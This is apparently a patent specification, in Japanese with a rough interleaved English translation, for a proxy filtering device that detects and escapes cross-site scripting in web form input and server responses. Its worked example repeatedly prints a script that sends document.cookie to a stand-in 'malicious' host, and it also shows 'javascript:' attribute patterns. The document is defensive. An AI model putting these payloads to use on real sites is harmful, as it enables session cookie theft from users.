"Test <script> window.open (" http: //malicious/save.cgi? "+ Escape (document.cookie)) </ script>"
When the POST method is used for transmitting the form, the message input part of the HTML request includes the form input item name and the form input character string. The form input character string can be extracted from this character string in the same manner as in the GET method.

次にステップ６０２において、ＩＮフィルタ１０８は前記フォーム入力文字列に対し、ルールテーブル１１０内のルールを全て適用し終わったか調べる。全て適用していれば本手順は終了し、そうでなければ次の手順に進む。
ステップ６０３において、ＩＮフィルタ１０８は次のルールをルールテーブル１１０から読み込む。本手順で取り上げる例では、まず図４の１つめのルール参照番号１のルールを読み込む。
次にステップ６０４において、ＩＮフィルタ１０８は読み込んだルールのｋｅｙ列のデータを取り出し、tag_nameであればステップ６０５、attr_valueであればステップ６０９に進む。本手順で取り上げる例では前者に該当するので、続いてステップ６０５に進む。
ステップ６０５において、ＩＮフィルタ１０８は前記ルールのtag_name列に指定したタグ名（scriptやstyle,imgなど）を含むＨＴＭＬ要素が、フォーム入力文字列に存在するか調べる。そのために前記タグ名の前に文字”＜”を連結して、フォーム入力文字列を検索する。もし存在すれば、ステップ６０６に進み、存在しなければステップ６０２に戻る。本手順で取り上げる例では、文字列”＜script”でステップ６０１のフォーム入力文字列を検索する。一致する文字列が見つかるのでステップ６０６に進む。
ステップ６０６において、ＩＮフィルタ１０８はルールテーブル１１０のattr_name列のデータを取り出す。もし空文字列であれば、前記フォーム入力文字列が不正コードであると確定するので、ステップ６０８に進む。そうでなければステップ６０７に進む。本手順で取り上げる例ではattr_name列のデータが空文字列であるのでステップ６０８に進む。 In step 602, the IN filter 108 checks whether all rules in the rule table 110 have been applied to the form input character string. If all are applied, this procedure ends. Otherwise, the procedure proceeds to the next procedure.
In step 603, the IN filter 108 reads the next rule from the rule table 110. In the example taken up in this procedure, first, the rule with the first rule reference number 1 in FIG. 4 is read.
Next, in step 604, the IN filter 108 extracts the data in the key column of the read rule. If tag_name, the process proceeds to step 605, and if it is attr_value, the process proceeds to step 609. The example taken up in this procedure corresponds to the former, and the process proceeds to step 605.
In step 605, the IN filter 108 checks whether an HTML element including the tag name (script, style, img, etc.) specified in the tag_name column of the rule exists in the form input character string. For this purpose, the form input character string is searched by concatenating the character “<” before the tag name. If it exists, the process proceeds to step 606, and if it does not exist, the process returns to step 602. In the example taken up in this procedure, the form input character string in step 601 is searched with the character string “<script”. Since a matching character string is found, the process proceeds to step 606.
In step 606, the IN filter 108 retrieves data in the attr_name column of the rule table 110. If it is an empty character string, since it is determined that the form input character string is an illegal code, the process proceeds to step 608. Otherwise, go to step 607. In the example taken up in this procedure, since the data in the attr_name column is an empty character string, the process proceeds to step 608.

ステップ６０７において、ＩＮフィルタ１０８はルールテーブル１１０のattr_name列の文字列、文字”＝”、attr_value列の文字列を連結して、tag_name列のタグの属性を指定する文字列が、ユーザ入力文字に含まれるか検索する。含まれていればフォーム入力文字列を不正コードとみなし、ステップ順６０８に進む。含まれていなければステップ６０２に戻る。
なお、実際には、図２、３に示すようにタグの属性値はダブルクォーテーションマーク（”）で囲まれたり、”＝”の前後に任意長の空白文字（スペース、タブ、改行など）が含まれたりするので、それを考慮して調べることになる。また、タグの属性値はタグ名の後、文字”＞”までの間に現れなくてはならないので、この点も検索の際に考慮する。 In step 607, the IN filter 108 concatenates the character string of the attr_name column of the rule table 110, the character “=”, and the character string of the attr_value column, and the character string specifying the tag attribute of the tag_name column becomes the user input character. Search for inclusion. If it is included, the form input character string is regarded as an illegal code, and the process proceeds to step order 608. If not included, the process returns to step 602.
Actually, as shown in FIGS. 2 and 3, the tag attribute value is enclosed in double quotation marks (“), and blank characters of arbitrary length (space, tab, line feed, etc.) are placed before and after“ = ”. The tag attribute value must appear after the tag name and before the character “>”, so this point is also included in the search. Consider.

ステップ６０７は、フォーム入力文字列にタグ名だけで不正コードと判断できない文字列が与えられ、かつ図４のルール参照番号２のルールのように、attr_name列とattr_value列に属性名と属性値が指定されたルールを適用する場合に実行される。
例えば、”＜style type=text/javascript＞…＜/style＞”のようなスタイルタグを含む文字列は、タグ名だけではスクリプトのような不正コードが含まれると判断できない。そこで、上記のように属性値を検索する必要がある。
ステップ６０８において、ＩＮフィルタ１０８は不正なコードが見つかったフォーム入力文字列と、その発見に使用したルール参照番号を組にして一致文字列バッファに追加し、ステップ６０２に戻る。本手順で取り上げる例では、一致文字列バッファには図８のように記録する。 In step 607, the form input character string is given a character string that cannot be determined as an illegal code only by the tag name, and the attribute name and attribute value are assigned to the attr_name column and the attr_value column as in the rule of rule reference number 2 in FIG. It is executed when the specified rule is applied.
For example, a character string including a style tag such as “<style type = text / javascript>... </ Style>” cannot be determined to include an illegal code such as a script only with the tag name. Therefore, it is necessary to search the attribute value as described above.
In step 608, the IN filter 108 adds the form input character string in which the invalid code is found and the rule reference number used for the discovery to the pair as a match character string buffer, and returns to step 602. In the example taken up in this procedure, the matching character string buffer is recorded as shown in FIG.

一方、ステップ６０９において、ＩＮフィルタ１０８はルールテーブル１１０のattr_value列の文字列がフォーム入力文字列に含まれるか検索する。見つかればステップ６０８へ、見つからなければステップ６０２へ戻る。
ステップ６０９は、タグの属性値内に含まれる不正コードである不正タグ属性値を発見するための処理である。例えば、ＵＲＩを指定可能なタグ属性に”javascript:…”のようなスクリプトを含むＵＲＩを与えると、”…”部のスクリプトが実行されてしまう。そのようなタグの記述例として”＜img src=javascript:…＞”がある。図４のルール参照番号ｎのルールは、このような不正コードを発見するためのものである。
ところで、属性値に埋め込まれた不正コードは２通りの方法で生成されうる。１つは、タグとその属性が一緒にフォーム入力文字列に埋め込まれ（例えば”＜img src=javascript:…＞”）、そのままＨＴＴＰ応答のＨＴＭＬ文書に現れる場合である。もう１つは、フォーム入力文字列がＷｅｂアプリケーションによってタグの属性値に埋め込まれ（例えば”javascript:…”が”＜img src=$＞”の”$”と置換される）、ＨＴＴＰ応答のＨＴＭＬ文書に現れる場合である。
ただし、後者の場合、フォーム入力文字列がＷｅｂアプリケーション１０６によって属性値として扱われず、ＨＴＴＰ応答のＨＴＭＬ文書中に含まれる場合、このＨＴＴＰ応答を受け取ったＷｅｂブラウザ１０３は悪影響を受けない。従って、フォーム入力文字列を単純に調べただけでは不正なコードであるかどうか判断できない。そこで、ＩＮフィルタ１０８はこのような不正の可能性のある文字列を見つけたらその文字列を一致文字列バッファにコピーし（ステップ６０８）、ＯＵＴフィルタ１０９が不正コードかどうか判断する。
なお、本手順では簡単のため、フォーム入力文字列項目が１つの場合を説明した。もしフォームに入力データ項目が複数ある場合、各入力データ項目はＨＴＴＰ要求内で文字”&”で区切られているので、ステップ６０１で容易に取り出すことができる。各入力項目について、ステップ６０５〜６０８の処理、またはステップ６０９と６０８の処理をすべて行ってから、ステップ６０２に戻って次のルールに移る。
ここで、ステップ６０４の判定で、ステップ６０５へ分岐する流れが不正タグ検出ルールを用いた処理であり、ステップ６０９へ分岐する流れが不正タグ属性値検出ルールを用いた処理である。 On the other hand, in step 609, the IN filter 108 searches whether the character string in the attr_value column of the rule table 110 is included in the form input character string. If found, return to step 608, otherwise return to step 602.
Step 609 is processing for finding an illegal tag attribute value which is an illegal code included in the tag attribute value. For example, if a URI including a script such as “javascript:...” Is given to a tag attribute that can specify a URI, the script “...” Is executed. An example of such a tag description is “<img src = javascript:...>”. The rule of rule reference number n in FIG. 4 is for finding such an illegal code.
By the way, the illegal code embedded in the attribute value can be generated by two methods. One is a case where the tag and its attribute are embedded together in the form input character string (for example, “<img src = javascript:...>”) And appear as it is in the HTML document of the HTTP response. The other is that the form input character string is embedded in the tag attribute value by the Web application (for example, "javascript: ..." is replaced with "$" in "<img src = $>"), and the HTML of the HTTP response It appears when it appears in a document.
However, in the latter case, when the form input character string is not handled as an attribute value by the Web application 106 and is included in the HTML document of the HTTP response, the Web browser 103 that has received the HTTP response is not adversely affected. Therefore, it is not possible to determine whether the code is invalid by simply examining the form input character string. Therefore, when the IN filter 108 finds such a character string that may be illegal, it copies the character string to the matching character string buffer (step 608), and determines whether the OUT filter 109 is an illegal code.
For the sake of simplicity in this procedure, the case where there is one form input character string item has been described. If there are a plurality of input data items in the form, each input data item is delimited by the character “&” in the HTTP request and can be easily extracted in step 601. For each input item, the processes in steps 605 to 608 or the processes in steps 609 and 608 are all performed, then the process returns to step 602 to move to the next rule.
Here, in the determination of step 604, the flow branching to step 605 is processing using the illegal tag detection rule, and the flow branching to step 609 is processing using the illegal tag attribute value detection rule.

図７は、Ｗｅｂブラウザ１０３から送られてきたＨＴＴＰ要求の例である。このＨＴＴＰ要求に含まれるフォームの入力データには、実行されるとクッキーをhttp://malicious/に送るスクリプトが含まれている。ここでは簡単のため、実施形態の説明に必要ないＨＴＴＰ要求ヘッダ部のフィールドなどは省略している。
図８は、本実施形態における一致文字列バッファである。
１列目がルール参照番号、２列目が不正コード（の可能性がある）フォーム入力文字列（以降、一致文字列と呼ぶ）で、各行が一組のデータとなる。 FIG. 7 is an example of an HTTP request sent from the Web browser 103. The form input data included in the HTTP request includes a script that, when executed, sends a cookie to http: // malicious /. Here, for the sake of simplicity, the fields of the HTTP request header portion that are not necessary for the description of the embodiment are omitted.
FIG. 8 is a matching character string buffer in the present embodiment.
The first column is a rule reference number, the second column is an illegal code (possibly) form input character string (hereinafter referred to as a matching character string), and each row is a set of data.

図９は、本実施例におけるＯＵＴフィルタ１０９での処理手順を示すフローチャートである。
本手順はＯＵＴフィルタ１０９にＨＴＴＰ応答のコピーが渡されたときに開始される。本手順で取り上げる例では渡されたＨＴＴＰ応答が図１０に示すように不正コードを含んだＨＴＴＰ応答であったものとする。このＨＴＴＰ応答には、図７のＨＴＴＰ要求に含まれていた、実行されるとクッキーをhttp://malicious/に送るスクリプトがＷｅｂアプリケーション１０６によって適切にエスケープ処理されずに残っている。
まず、ステップ９０１において、ＯＵＴフィルタ１０９は図８の一致文字列バッファ内の全てのエントリを調べ終わったか調べる。調べ終わっていれば、ステップ９０９に移り、調べ終わっていなければステップ９０２に移る。
ステップ９０２において、ＯＵＴフィルタ１０９は一致文字列バッファ内の次のエントリを読み込む。図８の例では１行目のデータを読み込む。
ステップ９０３において、ＯＵＴフィルタ１０９は前記エントリの一致文字列がＨＴＴＰ応答内に含まれているか調べる。含まれていればステップ９０４へ進み、含まれていなければステップ９０１へ戻る。図１０の例に示すＨＴＴＰ応答内には一致文字列が含まれているので、ステップ９０３へ進む。
ステップ９０４において、ＯＵＴフィルタ１０９は前記エントリのルール参照番号のルールをルールテーブル１１０から読み込む。本手順で取り上げた例ではルール参照番号１のルールを図４のルールテーブルから読み込む。
次にステップ９０５において、ＯＵＴフィルタ１０９は前記ルールのｋｅｙ列がtag_nameであれば前記一致文字列を不正コードとみなし、ステップ９０８に移る。attr_valueであればステップ９０６に進む。本手順で取り上げた例ではtag_nameであるのでステップ９０８に移る。
ステップ９０６において、ＯＵＴフィルタ１０９は前記ルールのattr_name列に文字”＝”を連結した文字列が、ステップ９０３で発見した一致文字列の直前に存在するか調べる。存在すればステップ９０７に進み、存在しなければステップ９０１へ戻る。 FIG. 9 is a flowchart showing a processing procedure in the OUT filter 109 in this embodiment.
This procedure is started when a copy of the HTTP response is passed to the OUT filter 109. In the example taken up in this procedure, it is assumed that the HTTP response passed is an HTTP response including an illegal code as shown in FIG. In this HTTP response, a script for sending a cookie to http: // malicious / when executed, which was included in the HTTP request of FIG. 7, remains without being properly escaped by the Web application 106.
First, in step 901, the OUT filter 109 checks whether all entries in the matching character string buffer in FIG. 8 have been checked. If the examination has been completed, the process proceeds to step 909. If the examination has not been completed, the process proceeds to step 902.
In step 902, the OUT filter 109 reads the next entry in the matching character string buffer. In the example of FIG. 8, the first row of data is read.
In step 903, the OUT filter 109 checks whether the matching character string of the entry is included in the HTTP response. If it is included, the process proceeds to step 904, and if it is not included, the process returns to step 901. Since the matching character string is included in the HTTP response shown in the example of FIG.
In step 904, the OUT filter 109 reads the rule with the rule reference number of the entry from the rule table 110. In the example taken up in this procedure, the rule with rule reference number 1 is read from the rule table of FIG.
In step 905, if the key string of the rule is tag_name, the OUT filter 109 regards the matched character string as an illegal code, and proceeds to step 908. If it is attr_value, the process proceeds to step 906. Since it is tag_name in the example taken up in this procedure, the process proceeds to step 908.
In step 906, the OUT filter 109 checks whether a character string in which the character “=” is concatenated with the attr_name column of the rule immediately before the matching character string found in step 903. If it exists, the process proceeds to step 907, and if it does not exist, the process returns to step 901.

ステップ９０６の処理は前記ルールのattr_name列とattr_value列で指定される属性を探すことを意味する。図４のルール参照番号３のルールを例にすれば、ＨＴＴＰ応答中で発見した一致文字列が”img=javascript:”という属性指定になっているかどうか調べている。実際には、図２、３に示すようにタグの属性値はダブルクォーテーションマーク（”）で囲まれたり、”＝”の前後に任意長の空白文字（スペース、タブ、改行など）が含まれたりするので、それを考慮して調べる。
ステップ９０７において、ＯＵＴフィルタ１０９は文字”＜”と前記ルールのtag_name列を連結した文字列からなるタグ開始文字列が、ステップ９０６で発見した属性指定文字列の前に存在するか調べる。存在すれば前記発見した属性指定文字列を不正コードとみなし、ステップ９０８に進む。存在しなければステップ９０１へ戻る。
ここで、発見した属性指定文字列からタグ開始文字列に遡るまでに文字”＞”があれば、発見した属性指定文字列はタグの中に記述されていないので属性値ではなく、ステップ９０１へ戻る。しかし、タグ開始文字列や文字”＞”が他の属性値の中に含まれていることもあるので、この点を考慮してタグ開始文字列を探す。 The processing in step 906 means searching for an attribute specified by the attr_name column and the attr_value column of the rule. Taking the rule of rule reference number 3 in FIG. 4 as an example, it is checked whether or not the matching character string found in the HTTP response has the attribute designation “img = javascript:”. Actually, as shown in Figs. 2 and 3, the tag attribute value is enclosed in double quotation marks ("), and any length of white space (space, tab, new line, etc.) is included before and after" = ". I will take it into consideration.
In step 907, the OUT filter 109 checks whether a tag start character string composed of a character string obtained by concatenating the character “<” and the tag_name string of the rule exists before the attribute designation character string found in step 906. If it exists, the found attribute designation character string is regarded as an illegal code, and the process proceeds to step 908. If not, the process returns to step 901.
If there is a character “>” from the found attribute designation character string to the tag start character string, the found attribute designation character string is not described in the tag and is not an attribute value. Return. However, since the tag start character string and the character “>” may be included in other attribute values, the tag start character string is searched in consideration of this point.

ステップ９０８において、ＯＵＴフィルタ１０９は前記不正コードに対して前記ルールのaction列に指定された処理を行い、ステップ９０１に戻る。
ここで、ステップ９０５の判定で、ステップ９０８へ分岐する流れが不正タグ検出ルールを用いた処理であり、ステップ９０６へ分岐する流れが不正タグ属性値検出ルールを用いた処理である。
本手順で取り上げた例では、図４のルールテーブル１１０の１行目のルール１に指定された処理を行が行われ、ＨＴＴＰ応答に含まれていたスクリプトが以下のように実行されない文字列に変換される（両端のダブルクォーテーションは除く）。
”test<script>window.open("http://malicious/save.cgi?"+escape(document.cookie))</script>” In step 908, the OUT filter 109 performs the process specified in the action column of the rule for the illegal code, and returns to step 901.
Here, in the determination of step 905, the flow branching to step 908 is processing using the illegal tag detection rule, and the flow branching to step 906 is processing using the illegal tag attribute value detection rule.
In the example taken up in this procedure, the process specified in rule 1 of the first line of the rule table 110 in FIG. 4 is performed, and the script included in the HTTP response is converted to a character string that is not executed as follows: Converted (excluding double quotations at both ends).
“Test < script > window.open (" http: //malicious/save.cgi? "+ Escape (document.cookie)) < / script >”

図４のルールテーブルに示したａｃｔｉｏｎ列の処理は、“対象：処理、処理、…”の書式となっている。対象がelementの場合は、不正コード内に含まれる、ルールのtag_name列で指定されたタグのＨＴＭＬ要素が処理対象となる。対象がattrの場合は、不正コード内に含まれる、ルールのattr_name列で指定した属性が処理対象となる。処理の{”a”, ”b”}は文字列”ａ”を文字列”ｂ”で置き換えることを意味し、delは削除を意味する。従って、図４の参照番号１のルールが指定する処理は、スクリプトタグで囲まれた要素”＜script＞…＜/script＞”内の”＜”を”<”に、”＞”を”>”に、”&”を”&”に変更することである。
同参照番号２のルールはスタイルタグで囲まれた要素に同様の変更を行うことを指定し、同参照番号３のルールはイメージタグ内の属性srcを削除することを指定する。
ステップ９０９において、ＯＵＴフィルタ１０９はＨＴＴＰ応答に含まれているＨＴＭＬ文書を変更していたか調べる。変更していればステップ９１０に、変更していなければステップ９１１に進む。本手順で取り上げた例ではＨＴＭＬ文書が変更されるのでステップ９１０に進む。 The processing of the action column shown in the rule table of FIG. 4 has a format of “target: processing, processing,...”. When the target is element, the HTML element of the tag specified in the tag_name column of the rule included in the illegal code is the processing target. When the target is attr, the attribute specified in the attr_name column of the rule included in the illegal code is the processing target. The process {"a", "b"} means replacing the character string "a" with the character string "b", and del means deleting. Therefore, the processing specified by the rule of reference number 1 in FIG. 4 is performed by using “<” in the element “<script>... / Script>” surrounded by script tags as “<” and “>” as “ > ”and“ & ”to“ & ”.
The rule with the same reference number 2 specifies that the same change is made to the element surrounded by the style tag, and the rule with the same reference number 3 specifies that the attribute src in the image tag is deleted.
In step 909, the OUT filter 109 checks whether the HTML document included in the HTTP response has been changed. If changed, the process proceeds to step 910, and if not changed, the process proceeds to step 911. In the example taken up in this procedure, since the HTML document is changed, the process proceeds to step 910.

ステップ９１０において、ＯＵＴフィルタ１０９はＨＴＴＰ応答内に埋め込むＨＴＭＬ文書のバイト数を、変更後のＨＴＭＬ文書のバイト数へ修正し、修正後のＨＴＴＰ応答をフィルタリング装置１０７へ返し、本手順を終了する。本手順で取り上げた例ではＨＴＭＬ文書のバイト数が１６進数でａ８バイトからｂ４バイトに修正される。修正後のＨＴＴＰ応答は図１１に示すようになり、下線１１０１〜１１０３で示す文字列が変更されている。
ステップ９１１においては、ＯＵＴフィルタ１０９は空文字列””をフィルタリング装置１０７へ返し、本手順を終了する。
本実施形態では、ＨＴＴＰ要求に含まれたフォーム入力項目だけをルール適用対象としたが、その他の部分、例えばＨＴＴＰ要求のヘッダ部のRefererフィールドなどをルール適用対象に含めてもよい。 In step 910, the OUT filter 109 corrects the number of bytes of the HTML document to be embedded in the HTTP response to the number of bytes of the changed HTML document, returns the corrected HTTP response to the filtering device 107, and ends this procedure. In the example taken up in this procedure, the number of bytes of the HTML document is corrected from a8 bytes to b4 bytes in hexadecimal. The corrected HTTP response is as shown in FIG. 11, and the character strings indicated by underlines 1101 to 1103 are changed.
In step 911, the OUT filter 109 returns an empty character string “” to the filtering device 107, and this procedure ends.
In the present embodiment, only the form input items included in the HTTP request are subject to rule application, but other parts, for example, the Referer field in the header part of the HTTP request may be included in the rule application target.

図１０は、図９で示すＯＵＴフィルタ１０９の実施手順において、フィルタリング装置１０７からＯＵＴフィルタ１０７へ渡されるＨＴＴＰ応答の例である。ここでは、説明に必要ないＨＴＴＰ応答のヘッダ部は省略されている。このＨＴＴＰ応答には、図７のＨＴＴＰ要求に含まれていた、実行されるとクッキーをhttp://malicious/に送るスクリプトがＷｅｂアプリケーション１０６によって適切にエスケープ処理されずに残っている。
図１１は、図１０のＨＴＴＰ応答に対して、図９で示すＯＵＴフィルタ１０９の実施手順を実行した結果得られるＨＴＴＰ応答である。図１０に含まれていたスクリプトが実行されないようにエスケープ処理されている。 FIG. 10 is an example of an HTTP response passed from the filtering device 107 to the OUT filter 107 in the procedure for executing the OUT filter 109 shown in FIG. Here, the header part of the HTTP response which is not necessary for explanation is omitted. In this HTTP response, a script for sending a cookie to http: // malicious / when executed, which was included in the HTTP request of FIG. 7, remains without being properly escaped by the Web application 106.
FIG. 11 is an HTTP response obtained as a result of executing the execution procedure of the OUT filter 109 shown in FIG. 9 with respect to the HTTP response of FIG. Escape processing is performed so that the script included in FIG. 10 is not executed.

本発明を適用したネットワークシステムの実施の形態を示すシステム構成図である。1 is a system configuration diagram showing an embodiment of a network system to which the present invention is applied. 検索キーを入力させるＨＴＭＬ文書の例を示す図である。It is a figure which shows the example of the HTML document which inputs a search key. 検索結果を表示するＨＴＭＬ文書の例を示す図である。It is a figure which shows the example of the HTML document which displays a search result. ルールテーブルの構成例を示す図である。It is a figure which shows the structural example of a rule table. フィルタリング装置の不正コードフィルタリング手順を示すフローチャートである。It is a flowchart which shows the illegal code filtering procedure of a filtering apparatus. ＩＮフィルタの処理手順を示すフローチャートである。It is a flowchart which shows the process sequence of IN filter. ＨＴＴＰ要求の例を示す図である。It is a figure which shows the example of an HTTP request | requirement. 一致文字列バッファの記録内容の例を示す図である。It is a figure which shows the example of the recording content of a matching character string buffer. ＯＵＴフィルタの処理手順を示すフローチャートである。It is a flowchart which shows the process sequence of OUT filter. 不正コードを含んだＨＴＴＰ応答の例を示す図である。It is a figure which shows the example of the HTTP response containing a malicious code. 不正コードが取り除かれたＨＴＴＰ応答の例を示す図である。It is a figure which shows the example of the HTTP response from which the malicious code was removed.

Explanation of symbols

１０１ネットワーク
１０２クライアントコンピュータ
１０３Ｗｅｂブラウザ
１０４サーバコンピュータ
１０５Ｗｅｂサーバ
１０６Ｗｅｂアプリケーション
１０７フィルタリング装置
１０８ＩＮフィルタ
１０９ＯＵＴフィルタ
１１０ルールテーブル
１１１ルール入出力部 DESCRIPTION OF SYMBOLS 101 Network 102 Client computer 103 Web browser 104 Server computer 105 Web server 106 Web application 107 Filtering apparatus 108 IN filter 109 OUT filter 110 Rule table 111 Rule input / output part

Claims

An IN filter that relays communication performed between a client and a server that returns an access response to the access request from the client, and filters the access request based on an illegal code detection rule stored in advance in a rule table; A filtering device comprising an OUT filter for filtering the access response based on the malicious code detection rule,
The IN filter receives an access request from the client, checks whether the code specified in the illegal code detection rule is included in the access request, and if included, the code is stored in the buffer memory. With means to copy,
The OUT filter receives an access response from the server, checks whether the code corresponding to the code stored in the buffer memory is included in the access response, and if included, A filtering apparatus comprising: means for changing a code based on a process defined in an illegal code detection rule that detects a code stored in the buffer memory.

The filtering apparatus according to claim 1, wherein the illegal code detection rule is an illegal tag detection rule that is a rule for detecting an illegal tag.

The filtering apparatus according to claim 1, wherein the illegal code detection rule is an illegal tag attribute value detection rule that is a rule for detecting an illegal tag attribute value.

The filtering apparatus according to claim 1, further comprising an interface for updating the illegal code detection rule.